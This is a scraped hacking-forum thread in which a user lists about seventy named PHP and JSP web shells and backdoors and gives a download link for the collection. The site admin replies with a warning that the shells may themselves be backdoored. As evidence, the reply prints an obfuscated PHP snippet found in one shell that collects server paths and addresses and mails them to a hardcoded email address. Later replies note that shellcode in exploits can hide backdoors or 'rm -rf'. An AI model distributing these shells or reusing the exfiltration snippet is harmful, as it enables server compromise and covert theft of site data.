Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 17, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 253
Members: 0
Total: 253
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> Shell Collection 100% working
Post new topic  Reply to topic View previous topic :: View next topic 
Shell Collection 100% working
PostPosted: Sun Dec 30, 2007 10:22 am Reply with quote
nox
Advanced user
Advanced user
 
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




.:: Collection Shell ::.

accept_language.txt
Ajax_PHP Command Shell.txt
Antichat Shell v1.3.txt
Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
aZRaiLPhp v1.0.txt
backupsql.txt
c99.txt
c99_locus7s.txt
c99_madnet.txt
c99_PSych0.php
c99_w4cking.txt
Crystal.txt
ctt_sh.txt
cybershell.txt
dC3 Security Crew Shell PRiV.txt
Dive Shell 1.0 - Emperor Hacking Team.txt
DTool Pro.txt
Dx.txt
GFS web-shell ver 3.1.7 - PRiV8.txt
gfs_sh.txt
h4ntu shell [powered by tsoi].txt
iMHaPFtp.txt
ironshell.txt
JspWebshell 1.2.txt
KAdot Universal Shell v0.1.6.txt
lamashell.txt
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
load_shell.txt
matamu.txt
Moroccan Spamers Ma-EditioN By GhOsT.txt
myshell.txt
Mysql interface v1.0.txt
MySQL Web Interface Version 0.8.txt
mysql.txt
mysql_tool.txt
NCC-Shell.txt
NetworkFileManagerPHP.txt
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
nshell.txt
nstview.txt
PH Vayv.txt
PHANTASMA.txt
PHP Shell.txt
php-backdoor.txt
php-include-w-shell.txt
pHpINJ.txt
PHPJackal.txt
PHPRemoteView.txt
Private-i3lue.txt
pws.txt
r57.txt
r57_iFX.txt
r57_kartal.txt
r57_Mohajer22.txt
rootshell.txt
ru24_post_sh.txt
s72 Shell v1.1 Coding.txt
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
sh3lls.rar
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
simple_cmd.txt
simple-backdoor.txt
SimShell 1.0 - Simorgh Security MGZ.txt
SnIpEr_SA Shell.txt
Uploader.txt
WinX Shell.txt
Worse Linux Shell.txt
zacosmall.txt


http://rapidshare.com/files/68569109/Shellz_collection_by_XtremeHacker_aka_deadlyhaxorz_aka_CyberCriminal.rar
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Dec 31, 2007 12:16 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Word of warning - any of these shells can be backdoored, so that somebody will actually exploit the exploiter Smile

Sample from one of the shells from this package:

Code:

}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");


Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Dec 31, 2007 1:15 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




waraxe wrote:
Word of warning - any of these shells can be backdoored, so that somebody will actually exploit the exploiter Smile

Sample from one of the shells from this package:

Code:

}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");


Rolling Eyes


In r57 have same shitt's.
View user's profile Send private message
PostPosted: Wed Jan 02, 2008 2:41 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




most of it Smile
better to create your own web shell Smile

and thats not only in web shell, also in most of exploits (hide under shellcode? for example) Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Jan 03, 2008 6:30 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




y3dips wrote:
most of it Smile
better to create your own web shell Smile

and thats not only in web shell, also in most of exploits (hide under shellcode? for example) Rolling Eyes


Yes, there were incidents even in bugtraq, where backdoors or just "rm -rf" were hidden to shellcode in 0-day exploit Smile
View user's profile Send private message Send e-mail Visit poster's website
Shell Collection 100% working
  www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.127 Seconds